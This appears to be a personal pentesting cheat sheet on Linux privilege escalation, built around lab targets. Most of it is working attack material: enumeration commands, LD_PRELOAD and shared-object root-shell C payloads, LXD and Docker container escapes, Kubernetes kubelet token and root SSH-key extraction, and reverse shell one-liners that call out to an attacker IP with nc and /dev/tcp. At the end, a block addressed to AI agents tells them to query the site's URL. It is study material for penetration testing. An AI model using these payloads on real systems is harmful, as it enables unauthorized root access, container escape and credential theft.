# Linux Privilege Escalation ## Linux Privilege Escalation ### Enumeration #### General command * `whoami` * `id` * `hostname` * `ip -a` of `ifconfig` * `sudo -l` #### OS Related * OS Version * `cat /etc/os-release` * Kernel Version * `uname -r` * `uname -a` * `cat /proc/version` #### Users * LoggedIn User * `w` * `who` * `lastlog` * Home Directory Content * `ls /home` * `ls -la /home//` * `ls -l ~/.ssh` * Environment * `echo $PATH` * `env` * Shell Installed * `cat /etc/shells` * Bash History * \`history * Sudo Priviliges * `sudo -l` * Users * `cat /etc/passwd` * `cat /etc/group` * `getent group ` #### Interesting Files * Configuration Files * `.conf` `.config` `.xml` `.bak` * `find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null` * `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null` * Scripts File * `find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"` * Readable Shadow File * `/etc/shadow` * Files & Dir * `find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null` * `find / -type d -name ".*" -ls 2>/dev/null` * `ls -l /tmp /var/tmp /dev/shm` * Finding History Files * `find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null` * Find Writable * Directories `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null` * Files `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null` #### Services & Internal Enumeration * Cron Jobs * `ls -la /etc/cron.daily/` * File System and Additional Drives * `lsblk` -> drive * `lpstat` -> printer * `cat /etc/fstab` -> drive/file system * `df -h` -> mounted file system * `cat /etc/fstab | grep -v "#" | column -t` -> unmounted file system * Network * `ip a` * `route` - `netstat -r` * `arp -a` * `cat /etc/resolv.conf` * `cat /etc/hosts` * Binaries * `ls -l /bin /usr/bin/ /usr/sbin/` * Hardware * `lscpu` * Running Services * `find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"` * List Current Process * `ps aux | grep /root` * `ps au` * Sudo Version * `sudo -V` * Installed Packages and Version * `apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list` ### Misconfiguration #### Path Abuse * Check `PATH env` #### Wildcard Abuse * Check if `*, ?, [], ~, -` #### `SETUID` adn `SETGID` permissions * `find "$DIRECTORY" -perm /4000` * `find "$DIRECTORY" -perm /2000` * `find "$DIRECTORY" -perm /u=s,g=s` * `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null` * `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null` #### Sudo Right Abuse * `sudo -l` #### Weak NFS * `showmount -e 10.129.2.12` * `cat /etc/exports` * Copy shell to /mnt and add SETUID * `cp shell /mnt` * `chmod u+s /mnt/shell` * `sudo mount -t nfs 10.129.2.12:/tmp /mnt` #### Hijacking Tmux Session * Check `tmux` process running as a privileged user (`dev` group onlu ) * `ps aux | grep tmux` * `ls -la /shareds` * `tmux -S /shareds` ### Capabilities * `CAP_SETUID` * `CAP_SETGID` * `CAP_SYS_ADMIN` * Enumerate * `find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;` ### Privileged Groups * `LXC/LXD` * Staring privilege container with privileged=true * `lxd init` * `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine` * \`lxc init alpine r00t -c security.privileged=true * `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true` * `lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true` * `lxc start r00t` * `lxc exec r00t /bin/sh` * `Docker` * see Docker Abuse * `Disk` * `ADM` ### Service and process Abuse #### Cron Job Abuse * `/etc/cron.d` * `ls -la /etc/cron.daily/` * Find writable file * `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null` * Enumerate running process * `./pspy64 -pf -i 1000` #### Docker Abuse * `Docker` * Same as Linux * Intereseting `docker.sock` - `/var/run/docker.sock` * `/tmp/docker -H unix:///app/docker.sock ps` * `/tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app` * `/tmp/docker -H unix:///app/docker.sock ps` * `/tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash` * `docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash` #### Kubernetes * **Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details**. * Control Plane -> master node * TCP etcd `2379`, `2380` * API Server `6443` * Scheduler `10251` * Controller manager `10252` * Kubelet API `10250` * Read-Only Kubelet API `10255` * Minion -> Worker Noded * API Server Interaction * `curl https://10.129.10.11:6443 -k` * Extracting Pod * `curl https://10.129.10.11:10250/pods -k | jq .` * Extracting pod * `kubeletctl -i --server 10.129.10.11 pods` * Available Commands * `kubeletctl -i --server 10.129.10.11 scan rce` * Execute Command * `$ kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx` * Extracting Token * `kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token` * Extracting Certificates * `kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt` * List Privileges * `export token=`cat k8.token\` * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list` * Creating new pod * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml` * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods` * Extracting root ssh key * `kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc` #### LogRotate * `logrotate` * `cat /etc/logrotate.conf` * `sudo cat /var/lib/logrotate.status` * `ls /etc/logrotate.d/` * `cat /etc/logrotate.d/dpkg` * For exploiting * write permission on the log files * run as root * vulnerable version e.g., 3.8.6, 3.11.0, 3.15.0, 3.18.0 * Tools - ### Shared Library #### General Information * Static libraries `.a` * Compiled and part of the program * dynamically linked shared object libraries `.so` * Can be altered * Specify location of dynamic libraries * when compiling `-rpath` or `-rpath-link` * using env `LD_RUN_PATH` or `LD_LIBRARY_PATH` * placing in `/lib` or `/usr/lib` * Changing `/etc/ld.so.conf` * `LD_PRELOAD` - load library before executing binary * `ldd binary` #### Exploiting `LD_PRELOAD` * Compile a `so object` ```c #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } ``` * `gcc -fPIC -shared -o root.so root.c -nostartfiles` * `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart` #### Shared Object Hijacking * Searching non standard library * use `ldd ` * Find `RUNPATH` configuration (load shared libraries from custom location) * `readelf -d payroll | grep PATH` * Before create a new library find function name called by binary * Running program and see undefined symbol * Create malicious shared object ``` #include #include void dbquery() { printf("Malicious library loaded\n"); setuid(0); system("/bin/sh -p"); ``` * `gcc src.c -fPIC -shared -o /development/libshared.so` #### Python Library Hijackin * Wrong write permission * Change content library where is used * ``` ``` ```python #!/usr/bin/env python3 import psutil available_memory = psutil.virtual_memory() ``` * `grep -r "def virtual_memory"` * Library Path * `python3 -c 'import sys; print("\n".join(sys.path))'` * module imported from target * write permission on specific module or on higher module`ls -al ` * `PYTHONPATH` environment variable * `PYTHONPATH` is an environment variable that indicates what directory (or directories) Python can search for modules to import. * `sudo PYTHONPATH=/newPATHWithLib /usr/bin/python3 ./mem_status.py` ### Various #### Passive Traffic Capture * net-creds - * PCredz - ### 0-day & Kernel Exploit * Sudo * Polkit * DirtyPipe - DirtyCow - * Netfilter ### Rev Shell * `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f` * `bash -i >& /dev/tcp/10.10.14.3/443 0>&1` ### Tools * LinEnum - [LinEnum](https://github.com/rebootuser/LinEnum) * [LinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) * strace - for get creds * [pspy](https://github.com/DominicBreuker/pspy) * [logrottten](https://github.com/whotwagner/logrotten) * [net-creds](https://github.com/DanMcInerney/net-creds) * [PCredz](https://github.com/lgandx/PCredz) * `readelf` * `ldd` ### Resources * [Escaping Restricted Shell](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#escaping-from-restricted-shells) * [SETUID and SETGID](https://linuxconfig.org/how-to-use-special-permissions-the-setuid-setgid-and-sticky-bits) * [GTFObins](https://gtfobins.github.io/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dado1513.dev/linux-pentesting/linux-pentesting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.